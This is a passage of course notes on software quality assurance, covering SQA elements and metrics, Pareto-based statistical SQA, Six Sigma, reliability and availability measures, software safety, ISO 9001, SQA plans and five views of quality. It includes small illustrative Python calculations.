CP 7026 - Software Quality Assurance



SOFTWARE QUALITY ASSURANCE

Definition:

Software quality assurance is:

1. A planned and systematic pattern of all actions necessary to provide adequate confidence that an item or product conforms to established technical requirements.

2. A set of activities designed to evaluate the process by which products are developed or manufactured. Contrast with: quality control.

3. A systematic, planned set of actions necessary to provide adequate confidence that the software development process or the maintenance process of a software system product conforms to established functional technical requirements as well as to the managerial requirements of keeping to the schedule and operating within budget.

Objectives of SQA

(1) Assuring an acceptable level of confidence that the software will conform to functional technical requirements.

(2) Assuring an acceptable level of confidence that the software will conform to managerial scheduling and budgetary requirements.

(3) Initiation and management of activities for the improvement and greater efficiency of software development and SQA activities.

Page 2: CP 7026 - Software Quality Assurance

ELEMENTS OF SOFTWARE QUALITY ASSURANCE

Software quality assurance encompasses a broad range of concerns and activities that focus on the management of software quality. These can be summarized in the following manner [Hor03]:

Standards. The IEEE, ISO, and other standards organizations have produced a broad array of software engineering standards and related documents. Standards may be adopted voluntarily by a software engineering organization or imposed by the customer or other stakeholders. The job of SQA is to ensure that standards that have been adopted are followed and that all work products conform to them.

Reviews and audits. Technical reviews are a quality control activity performed by software engineers for software engineers (Chapter 15). Their intent is to uncover errors. Audits are a type of review performed by SQA personnel with the intent of ensuring that quality guidelines are being followed for software engineering work. For example, an audit of the review process might be conducted to ensure that reviews are being performed in a manner that will lead to the highest likelihood of uncovering errors.

Testing. Software testing (Chapters 17 through 20) is a quality control function that has one primary goal—to find errors. The job of SQA is to ensure that testing is properly planned and efficiently conducted so that it has the highest likelihood of achieving its primary goal.

Error/defect collection and analysis. The only way to improve is to measure how you're doing. SQA collects and analyzes error and defect data to better understand how errors are introduced and what software engineering activities are best suited to eliminating them.

Change management. Change is one of the most disruptive aspects of any software project. If it is not properly managed, change can lead to confusion, and confusion almost always leads to poor quality. SQA ensures that adequate change management practices (Chapter 22) have been instituted.

WebRef: An in-depth discussion of SQA, including a wide array of definitions, can be obtained at www.swqual.com/newsletter/vol2/no1/vol2no1.html.


Education. Every software organization wants to improve its software engineering practices. A key contributor to improvement is education of software engineers, their managers, and other stakeholders. The SQA organization takes the lead in software process improvement (Chapter 30) and is a key proponent and sponsor of educational programs.

Vendor management. Three categories of software are acquired from external software vendors—shrink-wrapped packages (e.g., Microsoft Office), a tailored shell [Hor03] that provides a basic skeletal structure that is custom tailored to the needs of a purchaser, and contracted software that is custom designed and constructed from specifications provided by the customer organization. The job of the SQA organization is to ensure that high-quality software results by suggesting specific quality practices that the vendor should follow (when possible), and incorporating quality mandates as part of any contract with an external vendor.

Security management. With the increase in cyber crime and new government regulations regarding privacy, every software organization should institute policies that protect data at all levels, establish firewall protection for WebApps, and ensure that software has not been tampered with internally. SQA ensures that appropriate process and technology are used to achieve software security.

Safety. Because software is almost always a pivotal component of human-rated systems (e.g., automotive or aircraft applications), the impact of hidden defects can be catastrophic. SQA may be responsible for assessing the impact of software failure and for initiating those steps required to reduce risk.

Risk management. Although the analysis and mitigation of risk (Chapter 28) is the concern of software engineers, the SQA organization ensures that risk management activities are properly conducted and that risk-related contingency plans have been established.

In addition to each of these concerns and activities, SQA works to ensure that software support activities (e.g., maintenance, help lines, documentation, and manuals) are conducted or produced with quality as a dominant concern.


Quote: "Excellence is the unlimited ability to improve the quality of what you have to offer." (Rick Pitino)


SQA TASKS, GOALS, AND METRICS

Software quality assurance is composed of a variety of tasks associated with two different constituencies—the software engineers who do technical work and an SQA group that has responsibility for quality assurance planning, oversight, record keeping, analysis, and reporting.

Software engineers address quality (and perform quality control activities) by applying solid technical methods and measures, conducting technical reviews, and performing well-planned software testing.

1 SQA Tasks

The charter of the SQA group is to assist the software team in achieving a high-quality end product. The Software Engineering Institute recommends a set of SQA actions that address quality assurance planning, oversight, record keeping, analysis, and reporting. These actions are performed (or facilitated) by an independent SQA group that:

Prepares an SQA plan for a project. The plan is developed as part of project planning and is reviewed by all stakeholders. Quality assurance actions performed by the software engineering team and the SQA group are governed by the plan. The plan identifies evaluations to be performed, audits and reviews to be conducted, standards that are applicable to the project, procedures for error reporting and tracking, work products that are produced by the SQA group, and feedback that will be provided to the software team.

Participates in the development of the project's software process description. The software team selects a process for the work to be performed. The SQA group reviews the process description for compliance with organizational policy, internal software standards, externally imposed standards (e.g., ISO-9001), and other parts of the software project plan.


Reviews software engineering activities to verify compliance with the defined software process. The SQA group identifies, documents, and tracks deviations from the process and verifies that corrections have been made.

Audits designated software work products to verify compliance with those defined as part of the software process. The SQA group reviews selected work products; identifies, documents, and tracks deviations; verifies that corrections have been made; and periodically reports the results of its work to the project manager.

Ensures that deviations in software work and work products are documented and handled according to a documented procedure. Deviations may be encountered in the project plan, process description, applicable standards, or software engineering work products.

Records any noncompliance and reports to senior management. Noncompliance items are tracked until they are resolved.

In addition to these actions, the SQA group coordinates the control and management of change (Chapter 22) and helps to collect and analyze software metrics.

2 Goals, Attributes, and Metrics

The SQA actions described in the preceding section are performed to achieve a set of pragmatic goals:

Requirements quality. The correctness, completeness, and consistency of the requirements model will have a strong influence on the quality of all work products that follow. SQA must ensure that the software team has properly reviewed the requirements model to achieve a high level of quality.

Design quality. Every element of the design model should be assessed by the software team to ensure that it exhibits high quality and that the design itself conforms to requirements. SQA looks for attributes of the design that are indicators of quality.

Code quality. Source code and related work products (e.g., other descriptive information) must conform to local coding standards and exhibit characteristics that will facilitate maintainability. SQA should isolate those attributes that allow a reasonable analysis of the quality of code.

Quality control effectiveness. A software team should apply limited resources in a way that has the highest likelihood of achieving a high-quality result. SQA analyzes the allocation of resources for reviews and testing to assess whether they are being allocated in the most effective manner.

Figure 16.1 (adapted from [Hya96]) identifies the attributes that are indicators for the existence of quality for each of the goals discussed. Metrics that can be used to indicate the relative strength of an attribute are also shown.


Quote: "Quality is never an accident; it is always the result of high intention, sincere effort, intelligent direction and skillful execution; it represents the wise choice of many alternatives." (William A. Foster)


Figure 16.1: Software quality goals, attributes, and metrics (adapted from [Hya96])

Goal: Requirements quality
- Ambiguity: number of ambiguous modifiers (e.g., many, large, human-friendly)
- Completeness: number of TBA, TBD
- Understandability: number of sections/subsections
- Volatility: number of changes per requirement; time (by activity) when change is requested
- Traceability: number of requirements not traceable to design/code
- Model clarity: number of UML models; number of descriptive pages per model; number of UML errors

Goal: Design quality
- Architectural integrity: existence of architectural model
- Component completeness: number of components that trace to the architectural model; complexity of procedural design
- Interface complexity: average number of picks to get to a typical function or content; layout appropriateness
- Patterns: number of patterns used

Goal: Code quality
- Complexity: cyclomatic complexity
- Maintainability: design factors (Chapter 8)
- Understandability: percent internal comments; variable naming conventions
- Reusability: percent reused components
- Documentation: readability index

Goal: QC effectiveness
- Resource allocation: staff-hour percentage per activity
- Completion rate: actual vs. budgeted completion time
- Review effectiveness: see review metrics (Chapter 14)
- Testing effectiveness: number of errors found and their criticality; effort required to correct an error; origin of error

16.4 FORMAL APPROACHES TO SQA

In the preceding sections, I have argued that software quality is everyone's job and that it can be achieved through competent software engineering practice as well as through the application of technical reviews, a multi-tiered testing strategy, better control of software work products and the changes made to them, and the application of accepted software engineering standards. In addition, quality can be defined in terms of a broad array of quality attributes and measured (indirectly) using a variety of indices and metrics.

Over the past three decades, a small, but vocal, segment of the software engineering community has argued that a more formal approach to software quality assurance is required. It can be argued that a computer program is a mathematical object. A rigorous syntax and semantics can be defined for every programming language, and a rigorous approach to the specification of software requirements (Chapter 21) is available. If the requirements model (specification) and the programming language can be represented in a rigorous manner, it should be possible to apply mathematical proof of correctness to demonstrate that a program conforms exactly to its specifications.

Attempts to prove programs correct are not new. Dijkstra [Dij76a] and Linger, Mills, and Witt [Lin79], among others, advocated proofs of program correctness and tied these to the use of structured programming concepts (Chapter 10).

16.5 STATISTICAL SOFTWARE QUALITY ASSURANCE

Statistical quality assurance reflects a growing trend throughout industry to become more quantitative about quality. For software, statistical quality assurance implies the following steps:

1. Information about software errors and defects is collected and categorized.

2. An attempt is made to trace each error and defect to its underlying cause (e.g., nonconformance to specifications, design error, violation of standards, poor communication with the customer).

3. Using the Pareto principle (80 percent of the defects can be traced to 20 percent of all possible causes), isolate the 20 percent (the vital few).

4. Once the vital few causes have been identified, move to correct the problems that have caused the errors and defects.

This relatively simple concept represents an important step toward the creation of an adaptive software process in which changes are made to improve those elements of the process that introduce error.

16.5.1 A Generic Example

To illustrate the use of statistical methods for software engineering work, assume that a software engineering organization collects information on errors and defects for a period of one year. Some of the errors are uncovered as software is being developed. Others (defects) are encountered after the software has been released to its end users. Although hundreds of different problems are uncovered, all can be tracked to one (or more) of the following causes:

• Incomplete or erroneous specifications (IES)

• Misinterpretation of customer communication (MCC)


• Intentional deviation from specifications (IDS)

• Violation of programming standards (VPS)

• Error in data representation (EDR)

• Inconsistent component interface (ICI)

• Error in design logic (EDL)

• Incomplete or erroneous testing (IET)

• Inaccurate or incomplete documentation (IID)

• Error in programming language translation of design (PLT)

• Ambiguous or inconsistent human/computer interface (HCI)

• Miscellaneous (MIS)

To apply statistical SQA, the table in Figure 16.2 is built. The table indicates that IES, MCC, and EDR are the vital few causes that account for 53 percent of all errors. It should be noted, however, that IES, EDR, PLT, and EDL would be selected as the vital few causes if only serious errors are considered. Once the vital few causes are determined, the software engineering organization can begin corrective action. For example, to correct MCC, you might implement requirements gathering techniques (Chapter 5) to improve the quality of customer communication and specifications. To improve EDR, you might acquire tools for data modeling and perform more stringent data design reviews.
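The vital-few selection just described is easy to mechanize. The sketch below is a minimal illustration (ours, not part of the source text) that ranks the Figure 16.2 cause totals and accumulates counts until a chosen share of all errors is covered; the function name and the 50 percent threshold are illustrative assumptions.

```python
# Sketch: select the "vital few" causes from the Figure 16.2 totals (Pareto analysis).
# The 0.5 threshold is illustrative; the text arrives at IES, MCC, and EDR (~53%).

def vital_few(cause_counts, threshold=0.5):
    """Return the causes that together account for at least `threshold` of all errors."""
    total = sum(cause_counts.values())
    selected, accumulated = [], 0
    # Walk the causes from most to least frequent, accumulating their share.
    for cause, count in sorted(cause_counts.items(), key=lambda kv: kv[1], reverse=True):
        selected.append(cause)
        accumulated += count
        if accumulated / total >= threshold:
            break
    return selected, accumulated / total

totals = {"IES": 205, "MCC": 156, "IDS": 48, "VPS": 25, "EDR": 130, "ICI": 58,
          "EDL": 45, "IET": 95, "IID": 36, "PLT": 60, "HCI": 28, "MIS": 56}

causes, share = vital_few(totals)
print(causes, f"{share:.0%}")  # ['IES', 'MCC', 'EDR'] 52%
```

Running the same function over the Serious column instead surfaces IES and EDR first, with PLT and EDL close behind, consistent with the observation above.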

It is important to note that corrective action focuses primarily on the vital few. As the vital few causes are corrected, new candidates pop to the top of the stack.

Statistical quality assurance techniques for software have been shown to provide substantial quality improvement [Art97]. In some cases, software organizations have achieved a 50 percent reduction per year in defects after applying these techniques.

Figure 16.2: Data collection for statistical SQA

Error type | Total No. | Total % | Serious No. | Serious % | Moderate No. | Moderate % | Minor No. | Minor %
IES | 205 | 22% | 34 | 27% | 68 | 18% | 103 | 24%
MCC | 156 | 17% | 12 | 9% | 68 | 18% | 76 | 17%
IDS | 48 | 5% | 1 | 1% | 24 | 6% | 23 | 5%
VPS | 25 | 3% | 0 | 0% | 15 | 4% | 10 | 2%
EDR | 130 | 14% | 26 | 20% | 68 | 18% | 36 | 8%
ICI | 58 | 6% | 9 | 7% | 18 | 5% | 31 | 7%
EDL | 45 | 5% | 14 | 11% | 12 | 3% | 19 | 4%
IET | 95 | 10% | 12 | 9% | 35 | 9% | 48 | 11%
IID | 36 | 4% | 2 | 2% | 20 | 5% | 14 | 3%
PLT | 60 | 6% | 15 | 12% | 19 | 5% | 26 | 6%
HCI | 28 | 3% | 3 | 2% | 17 | 4% | 8 | 2%
MIS | 56 | 6% | 0 | 0% | 15 | 4% | 41 | 9%
Totals | 942 | 100% | 128 | 100% | 379 | 100% | 435 | 100%

Quote: "20 percent of the code has 80 percent of the errors. Find them, fix them!" (Lowell Arthur)


The application of statistical SQA and the Pareto principle can be summarized in a single sentence: Spend your time focusing on things that really matter, but first be sure that you understand what really matters!

16.5.2 Six Sigma for Software Engineering

Six Sigma is the most widely used strategy for statistical quality assurance in industry today. Originally popularized by Motorola in the 1980s, the Six Sigma strategy "is a rigorous and disciplined methodology that uses data and statistical analysis to measure and improve a company's operational performance by identifying and eliminating defects" in manufacturing and service-related processes [ISI08]. The term Six Sigma is derived from six standard deviations—3.4 instances (defects) per million occurrences—implying an extremely high quality standard. The Six Sigma methodology defines three core steps:

• Define customer requirements and deliverables and project goals via well-defined methods of customer communication.

• Measure the existing process and its output to determine current quality performance (collect defect metrics).

• Analyze defect metrics and determine the vital few causes.

If an existing software process is in place, but improvement is required, Six Sigma suggests two additional steps:

• Improve the process by eliminating the root causes of defects.

• Control the process to ensure that future work does not reintroduce the causes of defects.

These core and additional steps are sometimes referred to as the DMAIC (define, measure, analyze, improve, and control) method.
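As a rough illustration of the "measure" step, the sketch below (our own; all sample figures are hypothetical) converts raw defect counts into defects per million opportunities (DPMO), the quantity against which the 3.4-per-million Six Sigma target is judged.

```python
# Sketch: defects per million opportunities (DPMO) for the DMAIC "measure" step.
# All sample numbers are hypothetical.

def dpmo(defects, units, opportunities_per_unit):
    """Observed defects scaled to one million defect opportunities."""
    return defects / (units * opportunities_per_unit) * 1_000_000

# 120 defects across 4,000 shipped units, each with 15 opportunities for a defect:
print(dpmo(120, 4_000, 15))  # 2000.0 -- well short of the Six Sigma level of 3.4
```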

If an organization is developing a software process (rather than improving an existing process), the core steps are augmented as follows:

• Design the process to (1) avoid the root causes of defects and (2) meet customer requirements.

• Verify that the process model will, in fact, avoid defects and meet customer requirements.

This variation is sometimes called the DMADV (define, measure, analyze, design, and verify) method.

A comprehensive discussion of Six Sigma is best left to resources dedicated to the subject. If you have further interest, see [ISI08], [Pyz03], and [Sne03].


16.6 SOFTWARE RELIABILITY

There is no doubt that the reliability of a computer program is an important element of its overall quality. If a program repeatedly and frequently fails to perform, it matters little whether other software quality factors are acceptable.

Software reliability, unlike many other quality factors, can be measured directly and estimated using historical and developmental data. Software reliability is defined in statistical terms as "the probability of failure-free operation of a computer program in a specified environment for a specified time" [Mus87]. To illustrate, program X is estimated to have a reliability of 0.999 over eight elapsed processing hours. In other words, if program X were to be executed 1000 times and require a total of eight hours of elapsed processing time (execution time), it is likely to operate correctly (without failure) 999 times.
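The arithmetic behind that illustration can be written out directly. As a small worked equation (ours, not the source's), the expected number of failing runs is:

```latex
% Expected failures in N executions at reliability R
E[\text{failures}] = N(1 - R) = 1000 \times (1 - 0.999) = 1
```

That is, roughly one of the 1000 eight-hour executions is expected to fail, leaving 999 failure-free.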

Whenever software reliability is discussed, a pivotal question arises: What is meant by the term failure? In the context of any discussion of software quality and reliability, failure is nonconformance to software requirements. Yet, even within this definition, there are gradations. Failures can be only annoying or catastrophic. One failure can be corrected within seconds, while another requires weeks or even months to correct. Complicating the issue even further, the correction of one failure may in fact result in the introduction of other errors that ultimately result in other failures.

16.6.1 Measures of Reliability and Availability

Early work in software reliability attempted to extrapolate the mathematics of hardware reliability theory to the prediction of software reliability. Most hardware-related reliability models are predicated on failure due to wear rather than failure due to design defects. In hardware, failures due to physical wear (e.g., the effects of temperature, corrosion, shock) are more likely than a design-related failure. Unfortunately, the opposite is true for software. In fact, all software failures can be traced to design or implementation problems; wear (see Chapter 1) does not enter into the picture.

There has been an ongoing debate over the relationship between key concepts in hardware reliability and their applicability to software. Although an irrefutable link has yet to be established, it is worthwhile to consider a few simple concepts that apply to both system elements.

If we consider a computer-based system, a simple measure of reliability is mean-time-between-failure (MTBF):

MTBF = MTTF + MTTR

where MTTF and MTTR are mean-time-to-failure and mean-time-to-repair,² respectively.


Quote: "The unavoidable price of reliability is simplicity." (C. A. R. Hoare)

Note: Software reliability problems can almost always be traced to defects in design or implementation.

² Although debugging (and related corrections) may be required as a consequence of failure, in many cases the software will work properly after a restart with no other change.

Note: MTBF and related measures are based on CPU time, not wall-clock time.


Many researchers argue that MTBF is a far more useful measure than other quality-related software metrics discussed in Chapter 23. Stated simply, an end user is concerned with failures, not with the total defect count. Because each defect contained within a program does not have the same failure rate, the total defect count provides little indication of the reliability of a system. For example, consider a program that has been in operation for 3000 processor hours without failure. Many defects in this program may remain undetected for tens of thousands of hours before they are discovered. The MTBF of such obscure errors might be 30,000 or even 60,000 processor hours. Other defects, as yet undiscovered, might have a failure rate of 4000 or 5000 hours. Even if every one of the first category of errors (those with long MTBF) is removed, the impact on software reliability is negligible.

However, MTBF can be problematic for two reasons: (1) it projects a time span between failures but does not provide us with a projected failure rate, and (2) MTBF can be misinterpreted to mean average life span even though this is not what it implies.

An alternative measure of reliability is failures-in-time (FIT)—a statistical measure of how many failures a component will have over one billion hours of operation. Therefore, 1 FIT is equivalent to one failure in every billion hours of operation.

In addition to a reliability measure, you should also develop a measure of availability. Software availability is the probability that a program is operating according to requirements at a given point in time and is defined as

Availability = [MTTF / (MTTF + MTTR)] × 100%

The MTBF reliability measure is equally sensitive to MTTF and MTTR. The availability measure is somewhat more sensitive to MTTR, an indirect measure of the maintainability of software.
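To make the two formulas concrete, here is a minimal sketch (ours; the MTTF and MTTR figures are hypothetical CPU-hour values) that computes MTBF, availability, and the FIT equivalent:

```python
# Sketch: MTBF, availability, and FIT from MTTF/MTTR.
# Per the note above, these measures should be based on CPU time, not wall-clock time.

def mtbf(mttf, mttr):
    """Mean time between failures: MTBF = MTTF + MTTR."""
    return mttf + mttr

def availability(mttf, mttr):
    """Availability = MTTF / (MTTF + MTTR) * 100%."""
    return mttf / (mttf + mttr) * 100

def fit(mttf):
    """Failures in 10^9 hours of operation, assuming a constant failure rate."""
    return 1_000_000_000 / mttf

mttf_h, mttr_h = 900.0, 100.0                  # hypothetical CPU hours
print(mtbf(mttf_h, mttr_h))                    # 1000.0
print(round(availability(mttf_h, mttr_h), 1))  # 90.0 (%)
print(round(fit(mttf_h)))                      # 1111111
```

The availability measure's sensitivity to MTTR is visible here: halving MTTR to 50 hours raises availability to about 94.7 percent, while MTBF changes only modestly.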

16.6.2 Software Safety

Software safety is a software quality assurance activity that focuses on the identification and assessment of potential hazards that may affect software negatively and cause an entire system to fail. If hazards can be identified early in the software process, software design features can be specified that will either eliminate or control potential hazards.

A modeling and analysis process is conducted as part of software safety. Initially, hazards are identified and categorized by criticality and risk. For example, some of the hazards associated with a computer-based cruise control for an automobile might be: (1) causes uncontrolled acceleration that cannot be stopped, (2) does not respond to depression of brake pedal (by turning off), (3) does not engage when switch is activated, and (4) slowly loses or gains speed. Once these system-level hazards are identified, analysis techniques are used to assign severity and probability of occurrence.³ To be effective, software must be analyzed in the context of the entire system.



Note: Some aspects of availability (not discussed here) have nothing to do with failure. For example, scheduling downtime (for support functions) causes the software to be unavailable.

Quote: "The safety of the people shall be the highest law." (Cicero)

³ This approach is similar to the risk analysis methods described in Chapter 28. The primary difference is the emphasis on technology issues rather than project-related topics.


For example, a subtle user input error (people are system components) may be magnified by a software fault to produce control data that improperly positions a mechanical device. If and only if a set of external environmental conditions is met, the improper position of the mechanical device will cause a disastrous failure. Analysis techniques [Eri05] such as fault tree analysis, real-time logic, and Petri net models can be used to predict the chain of events that can cause hazards and the probability that each of the events will occur to create the chain.

Once hazards are identified and analyzed, safety-related requirements can be specified for the software. That is, the specification can contain a list of undesirable events and the desired system responses to these events. The role of software in managing undesirable events is then indicated.

Although software reliability and software safety are closely related to one another, it is important to understand the subtle difference between them. Software reliability uses statistical analysis to determine the likelihood that a software failure will occur. However, the occurrence of a failure does not necessarily result in a hazard or mishap. Software safety examines the ways in which failures result in conditions that can lead to a mishap. That is, failures are not considered in a vacuum, but are evaluated in the context of an entire computer-based system and its environment.

A comprehensive discussion of software safety is beyond the scope of this book. If you have further interest in software safety and related system issues, see [Smi05], [Dun02], and [Lev95].

THE ISO 9000 QUALITY STANDARDS⁴

A quality assurance system may be defined as the organizational structure, responsibilities, procedures, processes, and resources for implementing quality management [ANS87]. Quality assurance systems are created to help organizations ensure their products and services satisfy customer expectations by meeting their specifications. These systems cover a wide variety of activities encompassing a product's entire life cycle including planning, controlling, measuring, testing and reporting, and improving quality levels throughout the development and manufacturing process. ISO 9000 describes quality assurance elements in generic terms that can be applied to any business regardless of the products or services offered.

To become registered to one of the quality assurance system models contained in ISO 9000, a company's quality system and operations are scrutinized by third-party auditors for compliance to the standard and for effective operation. Upon successful registration, a company is issued a certificate from a registration body represented by the auditors. Semiannual surveillance audits ensure continued compliance to the standard.


Quote: "I cannot imagine any condition which would cause this ship to founder. Modern shipbuilding has gone beyond that." (E. J. Smith, captain of the Titanic)

WebRef: A worthwhile collection of papers on software safety can be found at www.safeware-eng.com/.

⁴ This section, written by Michael Stovsky, has been adapted from "Fundamentals of ISO 9000," a workbook developed for Essential Software Engineering, a video curriculum developed by R. S. Pressman & Associates, Inc. Reprinted with permission.


The requirements delineated by ISO 9001:2000 address topics such as management responsibility, quality system, contract review, design control, document and data control, product identification and traceability, process control, inspection and testing, corrective and preventive action, control of quality records, internal quality audits, training, servicing, and statistical techniques. In order for a software organization to become registered to ISO 9001:2000, it must establish policies and procedures to address each of the requirements just noted (and others) and then be able to demonstrate that these policies and procedures are being followed. If you desire further information on ISO 9001:2000, see [Ant06], [Mut03], or [Dob04].


WebRef: Extensive links to ISO 9000/9001 resources can be found at www.tantara.ab.ca/info.htm.

INFO: The ISO 9001:2000 Standard

The following outline defines the basic elements of the ISO 9001:2000 standard. Comprehensive information on the standard can be obtained from the International Organization for Standardization (www.iso.ch) and other Internet sources (e.g., www.praxiom.com).

• Establish the elements of a quality management system.
• Develop, implement, and improve the system.
• Define a policy that emphasizes the importance of the system.
• Document the quality system.
• Describe the process.
• Produce an operational manual.
• Develop methods for controlling (updating) documents.
• Establish methods for record keeping.
• Support quality control and assurance.
• Promote the importance of quality among all stakeholders.
• Focus on customer satisfaction.
• Define a quality plan that addresses objectives, responsibilities, and authority.
• Define communication mechanisms among stakeholders.
• Establish review mechanisms for the quality management system.
• Identify review methods and feedback mechanisms.
• Define follow-up procedures.
• Identify quality resources including personnel, training, and infrastructure elements.
• Establish control mechanisms: for planning, for customer requirements, for technical activities (e.g., analysis, design, testing), and for project monitoring and management.
• Define methods for remediation.
• Assess quality data and metrics.
• Define an approach for continuous process and quality improvement.

THE SQA PLAN

The SQA Plan provides a road map for instituting software quality assurance. Developed by the SQA group (or by the software team if an SQA group does not exist), the plan serves as a template for SQA activities that are instituted for each software project.

A standard for SQA plans has been published by the IEEE [IEE93]. The standard recommends a structure that identifies: (1) the purpose and scope of the plan, (2) a description of all software engineering work products (e.g., models, documents, source code) that fall within the purview of SQA, (3) all applicable standards and practices that are applied during the software process, (4) SQA actions and tasks (including reviews and audits) and their placement throughout the software process, (5) the tools and methods that support SQA actions and tasks, (6) software configuration management (Chapter 22) procedures, (7) methods for assembling, safeguarding, and maintaining all SQA-related records, and (8) organizational roles and responsibilities relative to product quality.
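A team can render that recommended structure as a simple checklist to verify plan coverage. The sketch below is our own illustration; the field names and sample values are hypothetical and are not part of the IEEE standard.

```python
# Sketch: the eight elements the IEEE-recommended SQA plan structure identifies,
# held as a checklist. All field names and sample values are illustrative only.

sqa_plan = {
    "purpose_and_scope": "SQA coverage for project X",
    "work_products_covered": ["models", "documents", "source code"],
    "standards_and_practices": ["local coding standard", "ISO 9001"],
    "sqa_actions_and_tasks": ["technical reviews", "audits"],
    "supporting_tools_and_methods": ["static analysis", "defect tracking"],
    "configuration_management_procedures": "see SCM plan (Chapter 22)",
    "records_management": "how SQA records are assembled, safeguarded, maintained",
    "roles_and_responsibilities": {"SQA group": "oversight", "software team": "quality control"},
}

# A quick completeness check during plan review:
missing = [element for element, value in sqa_plan.items() if not value]
print(missing or "all eight elements addressed")
```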


SOFTWARE TOOLS: Software Quality Management

Objective: The objective of SQA tools is to assist a project team in assessing and improving the quality of software work products.

Mechanics: Tool mechanics vary. In general, the intent is to assess the quality of a specific work product. Note: a wide array of software testing tools (see Chapters 17 through 20) are often included within the SQA tools category.

Representative tools:
• ARM, developed by NASA (satc.gsfc.nasa.gov/tools/index.html), provides measures that can be used to assess the quality of a software requirements document.
• QPR ProcessGuide and Scorecard, developed by QPR Software (www.qpronline.com), provides support for Six Sigma and other quality management approaches.
• Quality Tools and Templates, developed by iSixSigma (www.isixsigma.com/tt/), describes a wide array of useful tools and methods for quality management.
• NASA Quality Resources, developed by the Goddard Space Flight Center (sw-assurance.gsfc.nasa.gov/index.php), provides useful forms, templates, checklists, and tools for SQA.

SUMMARY

Software quality assurance is a software engineering umbrella activity that is applied at each step in the software process. SQA encompasses procedures for the effective application of methods and tools, oversight of quality control activities such as technical reviews and software testing, procedures for change management, procedures for assuring compliance to standards, and measurement and reporting mechanisms.

To properly conduct software quality assurance, data about the software engineering process should be collected, evaluated, and disseminated. Statistical SQA helps to improve the quality of the product and the software process itself. Software reliability models extend measurements, enabling collected defect data to be extrapolated into projected failure rates and reliability predictions.

In summary, you should note the words of Dunn and Ullman [Dun82]: "Software quality assurance is the mapping of the managerial precepts and design disciplines of quality assurance onto the applicable managerial and technological space of software engineering." The ability to ensure quality is the measure of a mature engineering discipline. When the mapping is successfully accomplished, mature software engineering is the result.


FIVE VIEWS OF SOFTWARE QUALITY

In the early days of computers, software developers mainly focused on product functionalities, and most of the end users were highly qualified professionals, such as mathematicians, scientists, and engineers. Development of personal computers and advances in computer networks, the World Wide Web, and graphical user interfaces made computer software highly accessible to all kinds of users. These days there is widespread computerization of many processes that used to be done by hand. For example, until the late 1990s taxpayers used to file returns on paper, but these days there are numerous web-based tax filing systems. There have been increasing customer expectations in terms of better quality in software products, and developers are under tremendous pressure to deliver high-quality products at a lower cost. Even though competing products deliver the same functionalities, it is the lower cost products with better quality attributes that survive in the competitive market. Therefore, all stakeholders—users, customers, developers, testers, and managers—in a product must have a broad understanding of the overall concept of software quality.

A number of factors influence the making and buying of software products. These factors are the user's needs and expectations, the manufacturer's considerations, the inherent characteristics of a product, and the perceived value of a product. To be able to capture the quality concept, it is important to study quality from a broader perspective. This is because the concept of quality predates software development. In a much cited paper published in the Sloan Management Review [1], Garvin has analyzed how quality is perceived in different manners in different domains, namely, philosophy, economics, marketing, and management:

Transcendental View: In the transcendental view, quality is something that can be recognized through experience but is not defined in some tractable form. Quality is viewed to be something ideal, which is too complex to lend itself to being precisely defined. However, a good-quality object stands out, and it is easily recognized. Because of the philosophical nature of the transcendental view, no effort is made to express it using concrete measures.

User View: The user view concerns the extent to which a product meets user needs and expectations. Quality is not just viewed in terms of what a product can deliver, but it is also influenced by the service provisions in the sales contract. In this view, a user is concerned with whether or not a product is fit for use. This view is highly personalized in nature. The idea of operational profile, discussed in Chapter 15, plays an important role in this view. Because of the personalized nature of the user view, a product is considered to be of good quality if it satisfies the needs of a large number of customers. It is useful to identify what product attributes users consider to be important. The reader may note that the user view can encompass many subjective elements apart from the expected functionalities central to user satisfaction. Examples of subjective elements are usability, reliability, testability, and efficiency.

Manufacturing View: The manufacturing view has its genesis in the manufacturing sectors, such as the automobile and electronics sectors. In this view, quality is seen as conforming to requirements. Any deviation from the stated requirements is seen as reducing the quality of the product. The concept of process plays a key role in the manufacturing view. Products are to be manufactured "right the first time" so that development cost and maintenance cost are reduced. However, there is no guarantee that conforming to process standards will lead to good products. Some criticize this view with an argument that conformance to a process can only lead to uniformity in the products, and, therefore, it is possible to manufacture bad-quality products in a consistent manner. However, product quality can be incrementally enhanced by continuously improving the process. Development of the capability maturity model (CMM) [2] and ISO 9001 [3] are based on the manufacturing view.

Product View: The central hypothesis in the product view is this: If a product is manufactured with good internal properties, then it will have good external qualities. The product view is attractive because it gives rise to an opportunity to explore causal relationships between internal properties and external qualities of a product. In this view, the current quality level of a product indicates the presence or absence of measurable product properties. The product view of quality can be assessed in an objective manner. An example of the product view of software quality is that a high degree of modularity, which is an internal property, makes software testable and maintainable.

Value-Based View: The value-based view represents a merger of two independent concepts: excellence and worth. Quality is a measure of excellence, and value is a measure of worth. The central idea in the value-based view is how much a customer is willing to pay for a certain level of quality. The reality is that quality is meaningless if a product does not make economic sense. Essentially, the value-based view represents a trade-off between cost and quality.

Measuring Quality. The five viewpoints help us in understanding different aspects of the quality concept. On the other hand, measurement allows us to have a quantitative view of the quality concept. In the following, we explain the reasons for developing a quantitative view of a software system [4]:

• Measurement allows us to establish baselines for qualities. Developers must know the minimum level of quality they must deliver for a product to be acceptable.

• Organizations make continuous improvements in their process models—and an improvement has a cost associated with it. Organizations need to know how much improvement in quality is achieved at a certain cost incurred due to process improvement. This causal relationship is useful in making management decisions concerning process improvement. Sometimes it may be worth investing more in process improvement, whereas at other times the return may not be significant.

• The present level of quality of a product needs to be evaluated so the need for improvements can be investigated.

Measurement of User's View. The user's view encompasses a number of quality factors, such as functionality, reliability, and usability. It is easy to measure how much of the functionalities a software product delivers by designing at least one test case for each functionality. A product may require multiple test cases for the same functionality if the functionality is to be performed in different execution environments. Then, the ratio of the number of passed test cases to the total number of test cases designed to verify the functionalities is a measure of the functionalities delivered by the product. Among the qualities that reflect the user's view, the concept of reliability has drawn the most attention of researchers.

In the ISO 9126 quality model, usability has been broken down into three subcharacteristics, namely, learnability, understandability, and operability. Learnability can be specified as the average elapsed time for a typical user to gain a certain level of competence in using the product. Similarly, understandability can be quantified as the average time needed by a typical user to gain a certain level of understanding of the product. One can quantify operability in a similar manner. The basic idea of breaking down usability into learnability, understandability, and operability can be seen in light of Gilb's technique [5]: The quality concept is broken down into component parts until each can be stated in terms of directly measurable attributes. Gilb's technique is general enough to be applicable to a wide variety of user-level qualities.
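Both of these user-view measures reduce to ratios and averages, as in the short sketch below (ours; the function names and data values are hypothetical):

```python
# Sketch: two user-view measures described above. Sample data are hypothetical.

def functionality_measure(passed_tests, designed_tests):
    """Ratio of passed test cases to all test cases designed for the functionalities."""
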